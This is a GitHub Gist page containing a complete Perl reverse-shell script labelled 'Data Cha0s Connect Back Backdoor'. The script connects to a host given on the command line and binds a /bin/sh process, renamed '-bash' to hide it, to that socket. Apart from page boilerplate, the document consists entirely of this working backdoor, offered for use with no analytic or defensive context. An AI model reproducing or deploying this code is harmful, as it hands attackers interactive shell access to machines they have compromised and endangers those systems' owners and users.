Created
February 24, 2017 15:53
-
-
Save islanddog/f5ad7636acf61fd963531ead7c784dc9 to your computer and use it in GitHub Desktop.
dc.pl - Backdoor Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
use Socket; | |
print "Data Cha0s Connect Back Backdoor\n\n"; | |
if (!$ARGV[0]) { | |
printf "Usage: $0 [Host] <Port>\n"; | |
exit(1); | |
} | |
print "[*] Dumping Arguments\n"; | |
$host = $ARGV[0]; | |
$port = 80; | |
if ($ARGV[1]) { | |
$port = $ARGV[1]; | |
} | |
print "[*] Connecting...\n"; | |
$proto = getprotobyname('tcp') || die("Unknown Protocol\n"); | |
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); | |
my $target = inet_aton($host); | |
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { | |
die("Unable to Connect\n"); | |
} | |
print "[*] Spawning Shell\n"; | |
if (!fork( )) { | |
open(STDIN,">&SERVER"); | |
open(STDOUT,">&SERVER"); | |
open(STDERR,">&SERVER"); | |
exec {'/bin/sh'} '-bash' . "\0" x 4; | |
exit(0); | |
} | |
print "[*] Datached\n\n"; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment